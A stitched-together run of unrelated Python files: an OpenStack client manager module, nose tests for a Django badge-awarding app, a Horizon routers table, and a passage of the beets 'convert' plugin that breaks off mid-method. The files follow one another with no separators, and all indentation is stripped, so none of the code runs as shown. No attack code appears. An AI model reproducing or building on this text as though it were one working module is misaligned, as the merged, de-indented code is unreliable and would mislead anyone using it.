# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Manage access to the clients, including authenticating when needed."""
import copy
import logging
import pkg_resources
import sys
from oslo_utils import strutils
import requests
from openstackclient.api import auth
from openstackclient.common import session as osc_session
from openstackclient.identity import client as identity_client
LOG = logging.getLogger(__name__)
PLUGIN_MODULES = []
USER_AGENT = 'python-openstackclient'
class ClientCache(object):
"""Descriptor class for caching created client handles."""
def __init__(self, factory):
self.factory = factory
self._handle = None
def __get__(self, instance, owner):
# Tell the ClientManager to login to keystone
if self._handle is None:
self._handle = self.factory(instance)
return self._handle
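# Example (editor's note): ClientManager below registers
#     identity = ClientCache(identity_client.make_client)
# so the first read of `client_manager.identity` invokes make_client(instance)
# and every later read returns the handle cached on the descriptor.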
class ClientManager(object):
"""Manages access to API clients, including authentication."""
# A simple incrementing version for the plugin to know what is available
PLUGIN_INTERFACE_VERSION = "2"
identity = ClientCache(identity_client.make_client)
def __getattr__(self, name):
# this is for the auth-related parameters.
if name in ['_' + o.replace('-', '_')
for o in auth.OPTIONS_LIST]:
return self._auth_params[name[1:]]
raise AttributeError(name)
def __init__(
self,
cli_options=None,
api_version=None,
verify=True,
pw_func=None,
):
"""Set up a ClientManager
:param cli_options:
Options collected from the command-line, environment, or wherever
:param api_version:
Dict of API versions: key is API name, value is the version
:param verify:
TLS certificate verification; may be a boolean to enable or disable
server certificate verification, or a filename of a CA certificate
bundle to be used in verification (implies True)
:param pw_func:
Callback function for asking the user for a password. The function
takes an optional string for the prompt ('Password: ' on None) and
returns a string containing the password
"""
self._cli_options = cli_options
self._api_version = api_version
self._pw_callback = pw_func
self._url = self._cli_options.auth.get('url', None)
self._region_name = self._cli_options.region_name
self._interface = self._cli_options.interface
self.timing = self._cli_options.timing
self._auth_ref = None
self.session = None
# verify is the Requests-compatible form
self._verify = verify
# also store in the form used by the legacy client libs
self._cacert = None
if isinstance(verify, bool):
self._insecure = not verify
else:
self._cacert = verify
self._insecure = False
# Get logging from root logger
root_logger = logging.getLogger('')
LOG.setLevel(root_logger.getEffectiveLevel())
def setup_auth(self):
"""Set up authentication
This is deferred until authentication is actually attempted because
it gets in the way of things that do not require auth.
"""
# If no auth type is named by the user, select one based on
# the supplied options
self.auth_plugin_name = auth.select_auth_plugin(self._cli_options)
# Basic option checking to avoid unhelpful error messages
auth.check_valid_auth_options(self._cli_options, self.auth_plugin_name)
# Horrible hack alert...must handle prompt for null password if
# password auth is requested.
if (self.auth_plugin_name.endswith('password') and
not self._cli_options.auth.get('password', None)):
self._cli_options.auth['password'] = self._pw_callback()
(auth_plugin, self._auth_params) = auth.build_auth_params(
self.auth_plugin_name,
self._cli_options,
)
# TODO(mordred): This is a usability improvement that's broadly useful
# We should port it back up into os-client-config.
default_domain = self._cli_options.default_domain
# NOTE(stevemar): If PROJECT_DOMAIN_ID or PROJECT_DOMAIN_NAME is
# present, then do not change the behaviour. Otherwise, set the
# PROJECT_DOMAIN_ID to 'OS_DEFAULT_DOMAIN' for better usability.
if (self._api_version.get('identity') == '3' and
self.auth_plugin_name.endswith('password') and
not self._auth_params.get('project_domain_id', None) and
not self.auth_plugin_name.startswith('v2') and
not self._auth_params.get('project_domain_name', None)):
self._auth_params['project_domain_id'] = default_domain
# NOTE(stevemar): If USER_DOMAIN_ID or USER_DOMAIN_NAME is present,
# then do not change the behaviour. Otherwise, set the USER_DOMAIN_ID
# to 'OS_DEFAULT_DOMAIN' for better usability.
if (self._api_version.get('identity') == '3' and
self.auth_plugin_name.endswith('password') and
not self.auth_plugin_name.startswith('v2') and
not self._auth_params.get('user_domain_id', None) and
not self._auth_params.get('user_domain_name', None)):
self._auth_params['user_domain_id'] = default_domain
# For compatibility until all clients can be updated
if 'project_name' in self._auth_params:
self._project_name = self._auth_params['project_name']
elif 'tenant_name' in self._auth_params:
self._project_name = self._auth_params['tenant_name']
        LOG.info('Using auth plugin: %s', self.auth_plugin_name)
        LOG.debug('Using parameters %s',
                  strutils.mask_password(self._auth_params))
self.auth = auth_plugin.load_from_options(**self._auth_params)
# needed by SAML authentication
request_session = requests.session()
self.session = osc_session.TimingSession(
auth=self.auth,
session=request_session,
verify=self._verify,
user_agent=USER_AGENT,
)
return
@property
def auth_ref(self):
"""Dereference will trigger an auth if it hasn't already"""
if not self._auth_ref:
self.setup_auth()
LOG.debug("Get auth_ref")
self._auth_ref = self.auth.get_auth_ref(self.session)
return self._auth_ref
def get_endpoint_for_service_type(self, service_type, region_name=None,
interface='public'):
"""Return the endpoint URL for the service type."""
if not interface:
interface = 'public'
# See if we are using password flow auth, i.e. we have a
# service catalog to select endpoints from
if self.auth_ref:
endpoint = self.auth_ref.service_catalog.url_for(
service_type=service_type,
region_name=region_name,
endpoint_type=interface,
)
else:
# Get the passed endpoint directly from the auth plugin
endpoint = self.auth.get_endpoint(self.session,
interface=interface)
return endpoint
def get_configuration(self):
return copy.deepcopy(self._cli_options.config)
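# Usage sketch (editor's addition): the service type, region, and interface
# below are illustrative values, not defaults defined by this module.
#
#     url = client_manager.get_endpoint_for_service_type(
#         'volume', region_name='RegionOne', interface='internal')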
# Plugin Support
def get_plugin_modules(group):
"""Find plugin entry points"""
mod_list = []
for ep in pkg_resources.iter_entry_points(group):
LOG.debug('Found plugin %r', ep.name)
__import__(ep.module_name)
module = sys.modules[ep.module_name]
mod_list.append(module)
init_func = getattr(module, 'Initialize', None)
if init_func:
init_func('x')
# Add the plugin to the ClientManager
setattr(
ClientManager,
module.API_NAME,
ClientCache(
getattr(sys.modules[ep.module_name], 'make_client', None)
),
)
return mod_list
def build_plugin_option_parser(parser):
"""Add plugin options to the parser"""
# Loop through extensions to get parser additions
for mod in PLUGIN_MODULES:
parser = mod.build_option_parser(parser)
return parser
# Get list of base plugin modules
PLUGIN_MODULES = get_plugin_modules(
'openstack.cli.base',
)
# Append list of external plugin modules
PLUGIN_MODULES.extend(get_plugin_modules(
'openstack.cli.extension',
))
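# Illustrative sketch (editor's addition): based on the attribute lookups in
# get_plugin_modules() and build_plugin_option_parser() above, a module exposed
# through the 'openstack.cli.base' or 'openstack.cli.extension' entry points is
# expected to provide roughly the following.  The 'oscplugin' name and the
# OSCPluginClient class are hypothetical placeholders.
#
#     API_NAME = 'oscplugin'
#
#     def Initialize(options):
#         # Optional hook; called by get_plugin_modules() when present.
#         pass
#
#     def make_client(instance):
#         # `instance` is the ClientManager; the result is cached by ClientCache.
#         return OSCPluginClient(session=instance.session)
#
#     def build_option_parser(parser):
#         parser.add_argument('--os-oscplugin-api-version', metavar='<version>')
#         return parser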
from os.path import dirname
import logging
import time
try:
from PIL import Image
except ImportError:
import Image
from django.conf import settings
from django.core.management import call_command
from django.db.models import loading
from django.core.files.base import ContentFile
from django.http import HttpRequest
from django.utils import simplejson as json
from django.test.client import Client
from django.core import mail
from nose.tools import assert_equal, with_setup, assert_false, eq_, ok_
from nose.plugins.attrib import attr
from django.template.defaultfilters import slugify
try:
from funfactory.urlresolvers import reverse
except ImportError, e:
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from . import BadgerTestCase
import badger
from badger.models import (Badge, Award, Progress, DeferredAward,
BadgeAwardNotAllowedException,
BadgeAlreadyAwardedException,
DeferredAwardGrantNotAllowedException,
SITE_ISSUER)
from badger.tests.badger_example.models import GuestbookEntry
BASE_URL = 'http://example.com'
BADGE_IMG_FN = "%s/fixtures/default-badge.png" % dirname(dirname(__file__))
class BadgerBadgeTest(BadgerTestCase):
def test_get_badge(self):
"""Can create a badge"""
badge = self._get_badge()
eq_(slugify(badge.title), badge.slug)
ok_(badge.created is not None)
ok_(badge.modified is not None)
eq_(badge.created.year, badge.modified.year)
eq_(badge.created.month, badge.modified.month)
eq_(badge.created.day, badge.modified.day)
def test_award_badge(self):
"""Can award a badge to a user"""
badge = self._get_badge()
user = self._get_user()
ok_(not badge.is_awarded_to(user))
badge.award_to(awardee=user, awarder=badge.creator)
ok_(badge.is_awarded_to(user))
def test_award_unique_duplication(self):
"""Only one award for a unique badge can be created"""
user = self._get_user()
b = Badge.objects.create(slug='one-and-only', title='One and Only',
unique=True, creator=user)
a = Award.objects.create(badge=b, user=user)
# award_to should not trigger the exception
b.award_to(awardee=user)
try:
a = Award.objects.create(badge=b, user=user)
ok_(False, 'BadgeAlreadyAwardedException should have been raised')
except BadgeAlreadyAwardedException, e:
# But, directly creating another award should trigger the exception
pass
eq_(1, Award.objects.filter(badge=b, user=user).count())
class BadgerOBITest(BadgerTestCase):
def test_baked_award_image(self):
"""Award gets image baked with OBI assertion"""
# Get the source for a sample badge image
        img_data = open(BADGE_IMG_FN, 'rb').read()
# Make a badge with a creator
user_creator = self._get_user(username="creator")
badge = self._get_badge(title="Badge with Creator",
creator=user_creator)
badge.image.save('', ContentFile(img_data), True)
# Get some users who can award any badge
user_1 = self._get_user(username="superuser_1", is_superuser=True)
user_2 = self._get_user(username="superuser_2", is_superuser=True)
# Get some users who can receive badges
user_awardee_1 = self._get_user(username="awardee_1")
        user_awardee_2 = self._get_user(username="awardee_2")
# Award a badge, and try to extract the badge assertion baked in
award_1 = badge.award_to(awardee=user_awardee_1)
ok_(award_1.image)
img = Image.open(award_1.image.file)
hosted_assertion_url = img.info['openbadges']
expected_url = '%s%s' % (
BASE_URL, reverse('badger.award_detail_json',
args=(award_1.badge.slug, award_1.id)))
eq_(expected_url, hosted_assertion_url)
return True
# TODO: Re-enable the testing below, if/when we go back to baking JSON
# rather than hosted assertion URLs.
assertion = json.loads(img.info['openbadges'])
# Check the top-level award assertion data
eq_(award_1.user.email, assertion['recipient'])
eq_('%s%s' % (BASE_URL, award_1.get_absolute_url()),
assertion['evidence'])
# Check some of the badge details in the assertion
a_badge = assertion['badge']
eq_('0.5.0', a_badge['version'])
eq_(badge.title, a_badge['name'])
eq_(badge.description, a_badge['description'])
eq_('%s%s' % (BASE_URL, badge.get_absolute_url()),
a_badge['criteria'])
# Check the badge issuer details
b_issuer = a_badge['issuer']
eq_(badge.creator.username, b_issuer['name'])
eq_(badge.creator.email, b_issuer['contact'])
eq_('%s%s' % (BASE_URL, badge.creator.get_absolute_url()),
b_issuer['origin'])
# Award a badge, and check that the awarder appears as issuer
award_2 = badge.award_to(awardee=user_awardee_2, awarder=user_1)
ok_(award_2.image)
img = Image.open(award_2.image.file)
assertion = json.loads(img.info['openbadges'])
b_issuer = assertion['badge']['issuer']
eq_(user_1.username, b_issuer['name'])
eq_(user_1.email, b_issuer['contact'])
eq_(BASE_URL, b_issuer['origin'])
# Make a badge with no creator
badge_no_creator = self._get_badge(title="Badge no Creator",
creator=False)
badge_no_creator.image.save('', ContentFile(img_data), True)
# Award a badge, and check that the site issuer is used
award_3 = badge_no_creator.award_to(awardee=user_awardee_1)
ok_(award_3.image)
img = Image.open(award_3.image.file)
assertion = json.loads(img.info['openbadges'])
b_issuer = assertion['badge']['issuer']
eq_(SITE_ISSUER['name'], b_issuer['name'])
eq_(SITE_ISSUER['contact'], b_issuer['contact'])
eq_(SITE_ISSUER['origin'], b_issuer['origin'])
class BadgerProgressTest(BadgerTestCase):
def test_progress_badge_already_awarded(self):
"""New progress toward an awarded unique badge cannot be recorded"""
user = self._get_user()
b = Badge.objects.create(slug='one-and-only', title='One and Only',
unique=True, creator=user)
p = b.progress_for(user)
p.update_percent(100)
try:
p = Progress.objects.create(badge=b, user=user)
ok_(False, 'BadgeAlreadyAwardedException should have been raised')
except BadgeAlreadyAwardedException, e:
pass
        # Zero remain, because awarding the badge deletes the progress record.
eq_(0, Progress.objects.filter(badge=b, user=user).count())
class BadgerDeferredAwardTest(BadgerTestCase):
def test_claim_by_code(self):
"""Can claim a deferred award by claim code"""
user = self._get_user()
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1)
da.save()
code = da.claim_code
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
DeferredAward.objects.claim_by_code(awardee, code)
eq_(0, DeferredAward.objects.filter(claim_code=code).count())
ok_(badge1.is_awarded_to(awardee))
# Ensure the award was marked with the claim code.
award = Award.objects.get(claim_code=code)
eq_(award.badge.pk, badge1.pk)
def test_claim_by_email(self):
"""Can claim all deferred awards by email address"""
deferred_email = 'winner@example.com'
user = self._get_user()
titles = ("Test A", "Test B", "Test C")
badges = (self._get_badge(title=title, creator=user)
for title in titles)
deferreds = []
# Issue deferred awards for each of the badges.
for badge in badges:
result = badge.award_to(email=deferred_email, awarder=user)
deferreds.append(result)
ok_(hasattr(result, 'claim_code'))
# Scour the mail outbox for claim messages.
for deferred in deferreds:
found = False
for msg in mail.outbox:
if (deferred.badge.title in msg.subject and
deferred.get_claim_url() in msg.body):
found = True
            ok_(found, 'Claim message for %s should have been found '
                       'in the mail outbox' % deferred.badge.title)
# Register an awardee user with the email address, but the badge should
# not have been awarded yet.
awardee = self._get_user(username='winner2', email=deferred_email)
for badge in badges:
ok_(not badge.is_awarded_to(awardee))
# Now, claim the deferred awards, and they should all self-destruct
eq_(3, DeferredAward.objects.filter(email=awardee.email).count())
DeferredAward.objects.claim_by_email(awardee)
eq_(0, DeferredAward.objects.filter(email=awardee.email).count())
# After claiming, the awards should exist.
for badge in badges:
ok_(badge.is_awarded_to(awardee))
def test_reusable_claim(self):
"""Can repeatedly claim a reusable deferred award"""
user = self._get_user()
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user, unique=False)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1, reusable=True)
da.save()
code = da.claim_code
for i in range(0, 5):
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
DeferredAward.objects.claim_by_code(awardee, code)
ok_(badge1.is_awarded_to(awardee))
eq_(5, Award.objects.filter(badge=badge1, user=awardee).count())
def test_disallowed_claim(self):
"""Deferred award created by someone not allowed to award a badge
cannot be claimed"""
user = self._get_user()
random_guy = self._get_user(username='random_guy',
is_superuser=False)
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1, creator=random_guy)
da.save()
code = da.claim_code
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
result = DeferredAward.objects.claim_by_code(awardee, code)
eq_(0, DeferredAward.objects.filter(claim_code=code).count())
ok_(not badge1.is_awarded_to(awardee))
def test_granted_claim(self):
"""Reusable deferred award can be granted to someone by email"""
# Assemble the characters involved...
creator = self._get_user()
random_guy = self._get_user(username='random_guy',
email='random_guy@example.com',
is_superuser=False)
staff_person = self._get_user(username='staff_person',
email='staff@example.com',
is_staff=True)
grantee_email = 'winner@example.com'
grantee = self._get_user(username='winner1',
email=grantee_email)
# Create a consumable award claim
badge1 = self._get_badge(title="Test A", creator=creator)
original_email = 'original@example.com'
da = DeferredAward(badge=badge1, creator=creator, email=original_email)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure the existing one is modified.
new_da = da.grant_to(email=grantee_email, granter=staff_person)
ok_(claim_code != new_da.claim_code)
ok_(da.email != original_email)
eq_(da.pk, new_da.pk)
eq_(new_da.email, grantee_email)
# Claim the deferred award, assert that the appropriate deferred award
# was destroyed
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(1, DeferredAward.objects.filter(pk=new_da.pk).count())
DeferredAward.objects.claim_by_email(grantee)
eq_(0, DeferredAward.objects.filter(pk=da.pk).count())
eq_(0, DeferredAward.objects.filter(pk=new_da.pk).count())
# Finally, assert the award condition
ok_(badge1.is_awarded_to(grantee))
# Create a reusable award claim
badge2 = self._get_badge(title="Test B", creator=creator)
da = DeferredAward(badge=badge2, creator=creator, reusable=True)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure a new deferred award is generated.
new_da = da.grant_to(email=grantee_email, granter=staff_person)
ok_(claim_code != new_da.claim_code)
ok_(da.pk != new_da.pk)
eq_(new_da.email, grantee_email)
# Claim the deferred award, assert that the appropriate deferred award
# was destroyed
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(1, DeferredAward.objects.filter(pk=new_da.pk).count())
DeferredAward.objects.claim_by_email(grantee)
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(0, DeferredAward.objects.filter(pk=new_da.pk).count())
# Finally, assert the award condition
ok_(badge2.is_awarded_to(grantee))
# Create one more award claim
badge3 = self._get_badge(title="Test C", creator=creator)
da = DeferredAward(badge=badge3, creator=creator)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure a new deferred award is generated.
try:
new_da = da.grant_to(email=grantee_email, granter=random_guy)
is_ok = False
except Exception, e:
ok_(type(e) is DeferredAwardGrantNotAllowedException)
is_ok = True
ok_(is_ok, "Permission should be required for granting")
def test_mass_generate_claim_codes(self):
"""Claim codes can be generated in mass for a badge"""
# Assemble the characters involved...
creator = self._get_user()
random_guy = self._get_user(username='random_guy',
email='random_guy@example.com',
is_superuser=False)
staff_person = self._get_user(username='staff_person',
email='staff@example.com',
is_staff=True)
# Create a consumable award claim
badge1 = self._get_badge(title="Test A", creator=creator)
eq_(0, len(badge1.claim_groups))
# Generate a number of groups of varying size
num_awards = (10, 20, 40, 80, 100)
num_groups = len(num_awards)
groups_generated = dict()
for x in range(0, num_groups):
num = num_awards[x]
cg = badge1.generate_deferred_awards(user=creator, amount=num)
time.sleep(1.0)
groups_generated[cg] = num
eq_(num, DeferredAward.objects.filter(claim_group=cg).count())
# Ensure the expected claim groups are available
eq_(num_groups, len(badge1.claim_groups))
for item in badge1.claim_groups:
cg = item['claim_group']
eq_(groups_generated[cg], item['count'])
# Delete deferred awards found in the first claim group
cg_1 = badge1.claim_groups[0]['claim_group']
badge1.delete_claim_group(user=creator, claim_group=cg_1)
# Assert that the claim group is gone, and now there's one less.
eq_(num_groups - 1, len(badge1.claim_groups))
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.template import defaultfilters as filters
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from neutronclient.common import exceptions as neutron_exceptions
from horizon import exceptions
from horizon import tables
from horizon.tables import actions
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard.usage import quotas
LOG = logging.getLogger(__name__)
class DeleteRouter(policy.PolicyTargetMixin, tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Router",
u"Delete Routers",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Router",
u"Deleted Routers",
count
)
redirect_url = "horizon:project:routers:index"
policy_rules = (("network", "delete_router"),)
@actions.handle_exception_with_detail_message(
# normal_log_message
'Failed to delete router %(id)s: %(exc)s',
# target_exception
neutron_exceptions.NeutronClientException,
# target_log_message
'Unable to delete router %(id)s: %(exc)s',
# target_user_message
_('Unable to delete router %(name)s: %(exc)s'),
# logger_name
__name__)
def delete(self, request, obj_id):
# detach all interfaces before attempting to delete the router
search_opts = {'device_owner': 'network:router_interface',
'device_id': obj_id}
ports = api.neutron.port_list(request, **search_opts)
for port in ports:
api.neutron.router_remove_interface(request, obj_id,
port_id=port.id)
api.neutron.router_delete(request, obj_id)
class CreateRouter(tables.LinkAction):
name = "create"
verbose_name = _("Create Router")
url = "horizon:project:routers:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_router"),)
def allowed(self, request, datum=None):
usages = quotas.tenant_quota_usages(request, targets=('router', ))
# when Settings.OPENSTACK_NEUTRON_NETWORK['enable_quotas'] = False
# usages['router'] is empty
if usages.get('router', {}).get('available', 1) <= 0:
if "disabled" not in self.classes:
self.classes = [c for c in self.classes] + ["disabled"]
self.verbose_name = _("Create Router (Quota exceeded)")
else:
self.verbose_name = _("Create Router")
self.classes = [c for c in self.classes if c != "disabled"]
return True
class EditRouter(policy.PolicyTargetMixin, tables.LinkAction):
name = "update"
verbose_name = _("Edit Router")
url = "horizon:project:routers:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_router"),)
class SetGateway(policy.PolicyTargetMixin, tables.LinkAction):
name = "setgateway"
verbose_name = _("Set Gateway")
url = "horizon:project:routers:setgateway"
classes = ("ajax-modal",)
icon = "camera"
policy_rules = (("network", "update_router"),)
def allowed(self, request, datum=None):
if datum.external_gateway_info:
return False
return True
class ClearGateway(policy.PolicyTargetMixin, tables.BatchAction):
help_text = _("You may reset the gateway later by using the"
" set gateway action, but the gateway IP may change.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Clear Gateway",
u"Clear Gateways",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Cleared Gateway",
u"Cleared Gateways",
count
)
name = "clear"
classes = ('btn-cleargateway',)
redirect_url = "horizon:project:routers:index"
policy_rules = (("network", "update_router"),)
action_type = "danger"
@actions.handle_exception_with_detail_message(
# normal_log_message
'Unable to clear gateway for router %(id)s: %(exc)s',
# target_exception
neutron_exceptions.Conflict,
# target_log_message
'Unable to clear gateway for router %(id)s: %(exc)s',
# target_user_message
        _('Unable to clear gateway for router %(name)s. '
          'The most likely reason is that the gateway is required '
          'by one or more floating IPs.'),
# logger_name
__name__)
def action(self, request, obj_id):
api.neutron.router_remove_gateway(request, obj_id)
def get_success_url(self, request):
return reverse(self.redirect_url)
def allowed(self, request, datum=None):
if datum.external_gateway_info:
return True
return False
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, router_id):
router = api.neutron.router_get(request, router_id)
return router
def get_external_network(router):
if router.external_gateway_info:
return router.external_gateway_info['network']
else:
return _("-")
def get_availability_zones(router):
if 'availability_zones' in router and router.availability_zones:
return ', '.join(router.availability_zones)
else:
return _("-")
class RoutersFilterAction(tables.FilterAction):
name = 'filter_project_routers'
filter_type = 'server'
filter_choices = (('name', _("Router Name ="), True),
('status', _("Status ="), True),
('admin_state_up', _("Admin State ="), True,
_("e.g. UP / DOWN")))
STATUS_DISPLAY_CHOICES = (
("active", pgettext_lazy("current status of router", u"Active")),
("error", pgettext_lazy("current status of router", u"Error")),
)
ADMIN_STATE_DISPLAY_CHOICES = (
("up", pgettext_lazy("Admin state of a Router", u"UP")),
("down", pgettext_lazy("Admin state of a Router", u"DOWN")),
)
class RoutersTable(tables.DataTable):
name = tables.WrappingColumn("name",
verbose_name=_("Name"),
link="horizon:project:routers:detail")
status = tables.Column("status",
verbose_name=_("Status"),
status=True,
display_choices=STATUS_DISPLAY_CHOICES)
distributed = tables.Column("distributed",
filters=(filters.yesno, filters.capfirst),
verbose_name=_("Distributed"))
ha = tables.Column("ha",
filters=(filters.yesno, filters.capfirst),
# Translators: High Availability mode of Neutron router
verbose_name=_("HA mode"))
ext_net = tables.Column(get_external_network,
verbose_name=_("External Network"))
admin_state = tables.Column("admin_state",
verbose_name=_("Admin State"),
display_choices=ADMIN_STATE_DISPLAY_CHOICES)
availability_zones = tables.Column(get_availability_zones,
verbose_name=_("Availability Zones"))
def __init__(self, request, data=None, needs_form_wrapper=None, **kwargs):
super(RoutersTable, self).__init__(
request,
data=data,
needs_form_wrapper=needs_form_wrapper,
**kwargs)
if not api.neutron.get_feature_permission(request, "dvr", "get"):
del self.columns["distributed"]
if not api.neutron.get_feature_permission(request, "l3-ha", "get"):
del self.columns["ha"]
try:
if not api.neutron.is_extension_supported(
request, "router_availability_zone"):
del self.columns["availability_zones"]
except Exception:
msg = _("Unable to check if router availability zone extension "
"is supported")
exceptions.handle(self.request, msg)
del self.columns['availability_zones']
def get_object_display(self, obj):
return obj.name
class Meta(object):
name = "routers"
verbose_name = _("Routers")
status_columns = ["status"]
row_class = UpdateRow
table_actions = (CreateRouter, DeleteRouter,
RoutersFilterAction)
row_actions = (SetGateway, ClearGateway, EditRouter, DeleteRouter)
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Jakob Schnitzer.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Converts tracks or albums to external directory
"""
from __future__ import division, absolute_import, print_function
import os
import threading
import subprocess
import tempfile
import shlex
from string import Template
from beets import ui, util, plugins, config
from beets.plugins import BeetsPlugin
from beets.util.confit import ConfigTypeError
from beets import art
from beets.util.artresizer import ArtResizer
_fs_lock = threading.Lock()
_temp_files = [] # Keep track of temporary transcoded files for deletion.
# Some convenient alternate names for formats.
ALIASES = {
u'wma': u'windows media',
u'vorbis': u'ogg',
}
LOSSLESS_FORMATS = ['ape', 'flac', 'alac', 'wav']
def replace_ext(path, ext):
"""Return the path with its extension replaced by `ext`.
The new extension must not contain a leading dot.
"""
return os.path.splitext(path)[0] + b'.' + ext
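# Example (editor's addition): paths and extensions are handled as bytes, and
# the extension is passed without a leading dot, e.g.
#     replace_ext(b'/music/track.flac', b'mp3')  ->  b'/music/track.mp3'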
def get_format(fmt=None):
"""Return the command tempate and the extension from the config.
"""
if not fmt:
fmt = config['convert']['format'].get(unicode).lower()
fmt = ALIASES.get(fmt, fmt)
try:
format_info = config['convert']['formats'][fmt].get(dict)
command = format_info['command']
extension = format_info['extension']
except KeyError:
raise ui.UserError(
u'convert: format {0} needs "command" and "extension" fields'
.format(fmt)
)
except ConfigTypeError:
command = config['convert']['formats'][fmt].get(bytes)
extension = fmt
# Convenience and backwards-compatibility shortcuts.
keys = config['convert'].keys()
if 'command' in keys:
command = config['convert']['command'].get(unicode)
elif 'opts' in keys:
# Undocumented option for backwards compatibility with < 1.3.1.
command = u'ffmpeg -i $source -y {0} $dest'.format(
config['convert']['opts'].get(unicode)
)
if 'extension' in keys:
extension = config['convert']['extension'].get(unicode)
return (command.encode('utf8'), extension.encode('utf8'))
def should_transcode(item, fmt):
"""Determine whether the item should be transcoded as part of
conversion (i.e., its bitrate is high or it has the wrong format).
"""
if config['convert']['never_convert_lossy_files'] and \
not (item.format.lower() in LOSSLESS_FORMATS):
return False
maxbr = config['convert']['max_bitrate'].get(int)
return fmt.lower() != item.format.lower() or \
item.bitrate >= 1000 * maxbr
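# Worked example (editor's addition), assuming the default max_bitrate of 500
# and never_convert_lossy_files disabled:
#   - a FLAC item with target format 'mp3'  -> True  (formats differ)
#   - a 320 kbps MP3 item with target 'mp3' -> False (same format, 320000 < 500 * 1000)
# With never_convert_lossy_files enabled, lossy sources (anything not listed in
# LOSSLESS_FORMATS) are never transcoded and the function returns False early.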
class ConvertPlugin(BeetsPlugin):
def __init__(self):
super(ConvertPlugin, self).__init__()
self.config.add({
u'dest': None,
u'pretend': False,
u'threads': util.cpu_count(),
u'format': u'mp3',
u'formats': {
u'aac': {
u'command': u'ffmpeg -i $source -y -vn -acodec libfaac '
u'-aq 100 $dest',
u'extension': u'm4a',
},
u'alac': {
u'command': u'ffmpeg -i $source -y -vn -acodec alac $dest',
u'extension': u'm4a',
},
u'flac': u'ffmpeg -i $source -y -vn -acodec flac $dest',
u'mp3': u'ffmpeg -i $source -y -vn -aq 2 $dest',
u'opus':
u'ffmpeg -i $source -y -vn -acodec libopus -ab 96k $dest',
u'ogg':
u'ffmpeg -i $source -y -vn -acodec libvorbis -aq 2 $dest',
u'wma':
u'ffmpeg -i $source -y -vn -acodec wmav2 -vn $dest',
},
u'max_bitrate': 500,
u'auto': False,
u'tmpdir': None,
u'quiet': False,
u'embed': True,
u'paths': {},
u'never_convert_lossy_files': False,
u'copy_album_art': False,
u'album_art_maxwidth': 0,
})
self.import_stages = [self.auto_convert]
self.register_listener('import_task_files', self._cleanup)
def commands(self):
cmd = ui.Subcommand('convert', help=u'convert to external location')
cmd.parser.add_option('-p', '--pretend', action='store_true',
help=u'show actions but do nothing')
cmd.parser.add_option('-t', '--threads', action='store', type='int',
help=u'change the number of threads, \
defaults to maximum available processors')
cmd.parser.add_option('-k', '--keep-new', action='store_true',
dest='keep_new', help=u'keep only the converted \
and move the old files')
cmd.parser.add_option('-d', '--dest', action='store',
help=u'set the destination directory')
cmd.parser.add_option('-f', '--format', action='store', dest='format',
help=u'set the target format of the tracks')
cmd.parser.add_option('-y', '--yes', action='store_true', dest='yes',
help=u'do not ask for confirmation')
cmd.parser.add_album_option()
cmd.func = self.convert_func
return [cmd]
def auto_convert(self, config, task):
if self.config['auto']:
for item in task.imported_items():
self.convert_on_import(config.lib, item)
# Utilities converted from functions to methods on logging overhaul
def encode(self, command, source, dest, pretend=False):
"""Encode `source` to `dest` using command template `command`.
Raises `subprocess.CalledProcessError` if the command exited with a
non-zero status code.
"""
# The paths and arguments must be bytes.
assert isinstance(command, bytes)
assert isinstance(source, bytes)
assert isinstance(dest, bytes)
quiet = self.config['quiet'].get(bool)
if not quiet and not pretend:
self._log.info(u'Encoding {0}', util.displayable_path(source))
# Substitute $source and $dest in the argument list.
args = shlex.split(command)
